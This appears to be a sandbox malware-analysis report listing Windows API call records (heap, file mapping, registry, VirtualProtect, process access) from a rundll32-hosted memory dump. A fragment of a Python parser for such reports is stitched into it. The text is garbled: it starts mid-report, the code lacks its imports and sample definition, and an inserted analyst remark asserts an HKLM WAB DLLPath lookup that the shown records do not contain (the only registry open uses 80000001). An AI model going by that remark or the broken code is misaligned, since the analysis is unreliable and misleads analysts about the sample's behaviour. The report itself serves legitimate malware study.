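• Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
Similarity
• API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
• String ID:
• API String ID: 1730969706-0
• Instruction Fuzzy Hash: FF71B2B5E00209EFCF10DFE9C888DAEBBB9BF48314B1485A9E516A7251D735AD41CF60
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0594A8C1
• memcpy.NTDLL(00000018,?,?), ref: 0594A8EA
• RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 0594A929
• HeapFree.KERNEL32(00000000,00000000), ref: 0594A93C
Similarity
• API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
• API String ID: 2780211928-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05944E5C
• _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 05944E72
• memset.NTDLL ref: 05944F1B
• memset.NTDLL ref: 05944F31
Similarity
• API ID: memset$_allmul_aulldiv
• API String ID: 3041852380-0
Uniqueness

Uniqueness Score: -1.00%
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# api.MODULE, an optional "(args)" list, and the "ref: XXXXXXXX" address.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# Bulleted "Key: value" meta lines (API ID, Instruction Fuzzy Hash, ...).
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# 8-digit hex immediates, optionally negative ("-00000008" appears in the report).
HEX_IMM = re.compile(r"^-?[0-9A-F]{8}$")


def parse_records(text):
    """Split the report text into one dict per 'APIs' record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "meta": {}}
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "api": m["api"], "module": m["mod"], "ref": m["ref"],
                "args": m["args"].split(",") if m["args"] else [],
                "subcall_of": m["sub"],          # None for a direct call
            })
            continue
        m = META_RE.match(line)
        if m:
            cur["meta"][m["key"]] = m["val"]
        elif line.startswith("Uniqueness Score:"):
            cur["meta"]["Uniqueness Score"] = line.split(":", 1)[1].strip()
    return records


def direct_sequence(record):
    """API names called directly by this function, in address order."""
    return [c["api"] for c in record["apis"] if c["subcall_of"] is None]


def literal_args(records):
    """(api, argument) pairs for recovered strings/symbols, i.e. arguments that
    are neither '?' nor hex immediates, such as registry paths and callbacks."""
    return [(c["api"], a) for r in records for c in r["apis"]
            for a in c["args"] if a != "?" and not HEX_IMM.match(a)]


def api_histogram(records, include_subcalls=False):
    """Counter of 'MODULE!api' across all records."""
    hist = Counter()
    for r in records:
        for c in r["apis"]:
            if c["subcall_of"] is None or include_subcalls:
                hist[f'{c["module"]}!{c["api"]}'] += 1
    return hist


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, r in enumerate(recs):
        print(i, r["meta"].get("API ID"), direct_sequence(r))
    print("recovered literals:", literal_args(recs))
    print("top APIs:", api_histogram(recs, include_subcalls=True).most_common(5))
```

The registry pivot is the one to act on here: `RegOpenKeyA(80000002, ...)` is an `HKEY_LOCAL_MACHINE` open, so the dumped code resolves a DLL path from `HKLM\Software\Microsoft\WAB\DLLPath` and hands it to `LoadLibraryA`/`GetProcAddress`; run the parser over the whole report and grep `literal_args` output for registry paths, file names and `Function_` callbacks before reading individual records.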

                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 05944BC8
                              • SetEvent.KERNEL32(?), ref: 05944C12
                              • TlsSetValue.KERNEL32(00000001), ref: 05944C4C
                              • TlsSetValue.KERNEL32(00000000), ref: 05944C68
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: b053460e46b19cce7e4e3e0060dbfe2fa96590307a1481d4ecd7cacac417c491
                              • Instruction ID: ec70ecfd7e94ae8bdbc37a605df3fc49c2df84af1b839ff95bab107c385650bb
                              • Opcode Fuzzy Hash: b053460e46b19cce7e4e3e0060dbfe2fa96590307a1481d4ecd7cacac417c491
                              • Instruction Fuzzy Hash: 7621D131204304AFCF219F64CD86EAABBBAFF80752B584529F50ACA160C731EC61DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,05933EC6), ref: 05945540
                                • Part of subcall function 0594550A: memset.NTDLL ref: 059455B6
                                • Part of subcall function 0594550A: memset.NTDLL ref: 059455CA
                              • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0594F0F5
                              • lstrcmpi.KERNEL32(00000000,?), ref: 0594F11C
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0594F161
                              • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0594F172
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                              • String ID:
                              • API String ID: 1065503980-0
                              • Opcode ID: 4ee587ce2c2be98a38c65645b33fd164ffe638c43101dcf1eac1113d07b08863
                              • Instruction ID: 12914e5c5897080251c319493f1e6fc41c8e53b76b97f4ebfb0189ce8806db82
                              • Opcode Fuzzy Hash: 4ee587ce2c2be98a38c65645b33fd164ffe638c43101dcf1eac1113d07b08863
                              • Instruction Fuzzy Hash: 3D213931A10209FFDF119FA4DD49EAEBFB9EB48355F104420F909E6210DB30AD689F50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594E0F3
                              • lstrlen.KERNEL32(00000000), ref: 0594E104
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • strcpy.NTDLL ref: 0594E11B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 0594E125
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 54fb393e614e168901faa5c6b91138e126973437a0d1d7b0731bb7464ace15dc
                              • Instruction ID: 3dac1dbac2e8d90bb55eb238b6cb27c858cbbbe93fa8532026e23c759ffbe0b6
                              • Opcode Fuzzy Hash: 54fb393e614e168901faa5c6b91138e126973437a0d1d7b0731bb7464ace15dc
                              • Instruction Fuzzy Hash: D6218076148305AFEB219B64D94AF2AB7EDFF48711F008419F9968B281EF75D814CB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 05932FB3
                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05932FF7
                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0593303A
                              • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0593305D
                                • Part of subcall function 0594B9E9: GetTickCount.KERNEL32 ref: 0594B9F9
                                • Part of subcall function 0594B9E9: CreateFileW.KERNEL32(05940971,80000000,00000003,0595A1E8,00000003,00000000,00000000,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA16
                                • Part of subcall function 0594B9E9: GetFileSize.KERNEL32(05940971,00000000,?,00000001,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA49
                                • Part of subcall function 0594B9E9: CreateFileMappingA.KERNEL32(05940971,0595A1E8,00000002,00000000,00000000,05940971), ref: 0594BA5D
                                • Part of subcall function 0594B9E9: lstrlen.KERNEL32(05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BA79
                                • Part of subcall function 0594B9E9: lstrcpy.KERNEL32(?,05940971), ref: 0594BA89
                                • Part of subcall function 0594B9E9: HeapFree.KERNEL32(00000000,05940971,?,05940971,00000000,?,0593C1F8,00000000), ref: 0594BAA4
                                • Part of subcall function 0594B9E9: CloseHandle.KERNEL32(05940971,?,00000001,?,05940971), ref: 0594BAB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: ef71f9532d7ccf6ff9b81665593228f3bf5a7ae8256c814d1c97fef70d356477
                              • Instruction ID: 4791a8e57f7f284cb07869b22c361ec077dcd5ddbb27c52398207e9c68be3916
                              • Opcode Fuzzy Hash: ef71f9532d7ccf6ff9b81665593228f3bf5a7ae8256c814d1c97fef70d356477
                              • Instruction Fuzzy Hash: 68217A31544208DAEF20DF66DD49EEEBBB9FF84354F140525F929921A0D7309949CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 0595297E
                              • RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05952999
                              • GetLastError.KERNEL32 ref: 05952A07
                              • GetLastError.KERNEL32 ref: 05952A16
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalErrorLastSection$EnterLeave
                              • String ID:
                              • API String ID: 2124651672-0
                              • Opcode ID: 40a182fdeebea968d5595c84fe55ff6c726c40b9da91fc56a1c793cc865769ad
                              • Instruction ID: ad45619ba40f2deee9d1243dcf2ae54cc7e1d3d7edd3362772adf40579e8debd
                              • Opcode Fuzzy Hash: 40a182fdeebea968d5595c84fe55ff6c726c40b9da91fc56a1c793cc865769ad
                              • Instruction Fuzzy Hash: A5216D36504208EFCF22CFA4D905A9EBBB8FF48725F114159FD06A3250CB35D921DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0593A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05937D5E), ref: 0593A6BE
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 05937D99
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0593C556,?), ref: 05937DAB
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0593C556,?), ref: 05937DC3
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,0593C556,?), ref: 05937DDE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 876dcff2fe8bde78ecbca75b82345e055550332f2fbbdcd0b384b0bbfc644958
                              • Instruction ID: 842df91caf1c8f1a5e2a4206470a6fad41b4a1f027bf67a7c0a466743f31944c
                              • Opcode Fuzzy Hash: 876dcff2fe8bde78ecbca75b82345e055550332f2fbbdcd0b384b0bbfc644958
                              • Instruction Fuzzy Hash: 711158B1A01228FBDF21ABA5DC8AEFFBE6DEF41694F104025F915E1050D7719A50CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,059366C0,?,00000000,?), ref: 05951CAB
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,059366C0,?,00000000,?), ref: 05951CCD
                              • lstrcpyW.KERNEL32(00000000,?), ref: 05951CF9
                              • lstrcatW.KERNEL32(00000000,?), ref: 05951D0C
                                • Part of subcall function 0593B83F: strstr.NTDLL ref: 0593B917
                                • Part of subcall function 0593B83F: strstr.NTDLL ref: 0593B96A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: 1e622f622f588293aa6f37d88c92cda7533453eba7dc63d19a6dc8f2dd67742c
                              • Instruction ID: d78a8942c43aa2d071e72ca2bbda5befef32acacea3f949e6822e6fbcce43dc5
                              • Opcode Fuzzy Hash: 1e622f622f588293aa6f37d88c92cda7533453eba7dc63d19a6dc8f2dd67742c
                              • Instruction Fuzzy Hash: 0A116772504519BFCB10AFA4CC8DEEEBFADFF092A5B014424F90596110EB34EE20DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?), ref: 0593A28B
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,?), ref: 0593A2A2
                              • StrChrA.SHLWAPI(00000000,0000002E), ref: 0593A2AB
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0593A2C9
                                • Part of subcall function 05938C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05938D0D
                                • Part of subcall function 05938C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61), ref: 05938D28
                                • Part of subcall function 05938C35: RtlEnterCriticalSection.NTDLL(0595A400), ref: 05938D4D
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                              • String ID:
                              • API String ID: 105881616-0
                              • Opcode ID: 311830d2ca69e4fe8ff7e5b2b4f9326e58291a3b269408d38e52786d1b62d28d
                              • Instruction ID: a09754b56ec9093bd81c90775bb846126ed87ff49a5e053b099f28d2821999eb
                              • Opcode Fuzzy Hash: 311830d2ca69e4fe8ff7e5b2b4f9326e58291a3b269408d38e52786d1b62d28d
                              • Instruction Fuzzy Hash: 01214974A04309EFDB11DFA8C84ABAEBBF9FF84300F108059E4869B651DB74D981CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05951D62
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05951D86
                              • RegCloseKey.ADVAPI32(?), ref: 05951DDE
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 05951DAF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: QueryValue$AllocateCloseHeapOpen
                              • String ID:
                              • API String ID: 453107315-0
                              • Opcode ID: debf0b73a13959f4fa8cf69eb908179964aa19d50aa8056d066122746ad654f2
                              • Instruction ID: 3d2e18df1a323d19d2e622d745234e50dbc3533f60ffaadf3b9f0b34cbf7589e
                              • Opcode Fuzzy Hash: debf0b73a13959f4fa8cf69eb908179964aa19d50aa8056d066122746ad654f2
                              • Instruction Fuzzy Hash: 4121C4B590050CFFDF11DF99C884EEEBBBDFB88250F208456F842A6210E7719A60EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0594EAA8,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 05932646
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593265E
                              • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0594EAA8,00000000,?,00000000,0593E842,00000000,05F3C310), ref: 059326A2
                              • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 059326C3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 2f8ad249ba70b7547b2ed54ba6a207f314f0ef7e2a12aaae762e7bd2361f7c76
                              • Instruction ID: 0a7374eb7ef0e6f0881439b4f2a58a02b7479d93a42f25d6220e769ed1ab5f8f
                              • Opcode Fuzzy Hash: 2f8ad249ba70b7547b2ed54ba6a207f314f0ef7e2a12aaae762e7bd2361f7c76
                              • Instruction Fuzzy Hash: D0112976A00214EFC7108F69EC8AD9EBFEEEFC1261B050276F409D7141EB709E1487A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GlobalFix.KERNEL32(00000000), ref: 0594223E
                              • memset.NTDLL ref: 05942252
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0594225F
                                • Part of subcall function 0594C563: OpenProcess.KERNEL32(00000410,B8F475FF,05942289,00000000,00000000,05942289,0000001C,00000000,00000000,?,?,?,05942289), ref: 0594C5BD
                                • Part of subcall function 0594C563: CloseHandle.KERNEL32(00000000,00000000,00000000,05942299,00000104,?,?,?,05942289), ref: 0594C5DB
                                • Part of subcall function 0594C563: GetSystemTimeAsFileTime.KERNEL32(05942289), ref: 0594C643
                              • GlobalUnWire.KERNEL32(00000000), ref: 0594228A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                              • String ID:
                              • API String ID: 3286078456-0
                              • Opcode ID: 4d7084d8624fe74423fd27d75b4603d69e5d01ee2de0425e1dd5177393becc34
                              • Instruction ID: d07d966392cbea683b6348c16e3f0cb9f2f5ce7332283d913f37a135d0eb6a49
                              • Opcode Fuzzy Hash: 4d7084d8624fe74423fd27d75b4603d69e5d01ee2de0425e1dd5177393becc34
                              • Instruction Fuzzy Hash: CB113375A08305EBEB11ABB5D849BAEBFBCBB48601F044116F906E6240EF74C911CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0593AE46,00000000,00000000), ref: 05951C3D
                              • GetLastError.KERNEL32(?,?,?,0593AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,0593EBC1,?,0000001E), ref: 05951C45
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: 473bb17b2aa1f0edddf1a2d8bc036d4a44b4a248029972807cdfa53f6285110a
                              • Instruction ID: 90dd1995ea5f981badb66cef4c0f0682a3a63fcf4fcc437841d6017c63a30197
                              • Opcode Fuzzy Hash: 473bb17b2aa1f0edddf1a2d8bc036d4a44b4a248029972807cdfa53f6285110a
                              • Instruction Fuzzy Hash: 740171761083517F8721EA76DC4CE6BBF6DEBC6B70B110A19F8A592280DB21A814D771
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,?,?,00000000,?,?,05931D09,?,?,?,?,?,?,?,?,?), ref: 059327F4
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • mbstowcs.NTDLL ref: 0593280E
                              • lstrlen.KERNEL32(?), ref: 05932819
                              • mbstowcs.NTDLL ref: 05932833
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BB71
                                • Part of subcall function 0594BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                                • Part of subcall function 0594BAD1: lstrlenW.KERNEL32(?), ref: 0594BBCC
                                • Part of subcall function 0594BAD1: memset.NTDLL ref: 0594BBEF
                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                              • String ID:
                              • API String ID: 1961997177-0
                              • Opcode ID: e84fc5da514601db6a1eecfda94bff13418fb3bdf393c000fa54f96946194d7b
                              • Instruction ID: afd81112d50aa88be8eceb34b26cc2fa1befde793295f1807ada10d58e4d38fb
                              • Opcode Fuzzy Hash: e84fc5da514601db6a1eecfda94bff13418fb3bdf393c000fa54f96946194d7b
                              • Instruction Fuzzy Hash: B801B573A00204B7DF11ABA58C8DF9F7BADEFC4750F144425F50596200EA79ED108BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05940D10,?,00000000,00000000), ref: 0594E04E
                              • lstrlen.KERNEL32(05F3C178,?,05940D10,?,00000000,00000000), ref: 0594E06F
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 0594E087
                              • lstrcpy.KERNEL32(00000000,05F3C178), ref: 0594E099
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: 5d71775003ba443d47f6cca12c18657e935bfdebddbffa2bf8fba7c341241563
                              • Instruction ID: 848907a12f0ca5bdc2fe97d7b891df409ca3ea4a8824f95f0079848df9862f46
                              • Opcode Fuzzy Hash: 5d71775003ba443d47f6cca12c18657e935bfdebddbffa2bf8fba7c341241563
                              • Instruction Fuzzy Hash: 5A01C876908344EFC7119BB8A849E6FBFBCBB49201F054165F95AD3241DB3099148FA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 05931B7E
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 05931BA4
                              • lstrcpy.KERNEL32(00000014,?), ref: 05931BC9
                              • memcpy.NTDLL(?,?,?), ref: 05931BD6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 4e464f7a5ba375ed7e5b8c0e1f027ffc6716b02df9cc8b92416eaa8d09be0ae5
                              • Instruction ID: 1113a27df9e89bd663a94cbabc399e2b1dbbf12d229cff18bfb38da3b4d10d5f
                              • Opcode Fuzzy Hash: 4e464f7a5ba375ed7e5b8c0e1f027ffc6716b02df9cc8b92416eaa8d09be0ae5
                              • Instruction Fuzzy Hash: 9711887190430AEFCB20CF18D885E9ABBF8FF48304F00842AF84A87221D730E914DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0593B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 05949E17
                              • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05949E2F
                              • memcpy.NTDLL(0000000C,?,00000001), ref: 05949E45
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05F3C304,00000000,?,05936584,?), ref: 0593A90E
                                • Part of subcall function 0593A8E9: StrTrimA.SHLWAPI(00000020,05955FCC,00000000,?,05936584,?), ref: 0593A92D
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,?,05936584,?), ref: 0593A939
                              • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 05949E77
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                              • String ID:
                              • API String ID: 3208927540-0
                              • Opcode ID: 87c836a999fcad54f8b45d863ea30f1817ec79e80ccd8151e2481cd368e9f1ad
                              • Instruction ID: 7ae3e229831fca8502eac6f951a0aa0e0cbee60596f9f56165b8ec711762945a
                              • Opcode Fuzzy Hash: 87c836a999fcad54f8b45d863ea30f1817ec79e80ccd8151e2481cd368e9f1ad
                              • Instruction Fuzzy Hash: EF01A731618701EBD3219E61EC4AF2BBFADFBC1B51F048525F64996080DB709C199B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • RtlInitializeCriticalSection.NTDLL(0595A400), ref: 05945285
                              • RtlInitializeCriticalSection.NTDLL(0595A3E0), ref: 0594529B
                              • GetVersion.KERNEL32(?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452AC
                              • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059452E0
                                • Part of subcall function 059468AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,059452C3), ref: 059468C4
                                • Part of subcall function 059468AC: LoadLibraryA.KERNEL32(?), ref: 05946965
                                • Part of subcall function 059468AC: FreeLibrary.KERNEL32(00000000), ref: 05946970
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: c97309228569946f0cc88869278bee24aa5f38c641da144eb8d4122bf3ccb379
                              • Instruction ID: 02d0937515a381e58cbb9ef623dab2a2d31d6b331df0ae3f90247cb6d27be4ea
                              • Opcode Fuzzy Hash: c97309228569946f0cc88869278bee24aa5f38c641da144eb8d4122bf3ccb379
                              • Instruction Fuzzy Hash: BD11C471A783019BD700DFB9E98AA15BFE4F785326741072AF605C7200DFB858A08F48
                              Uniqueness

                              Uniqueness Score: -1.00%

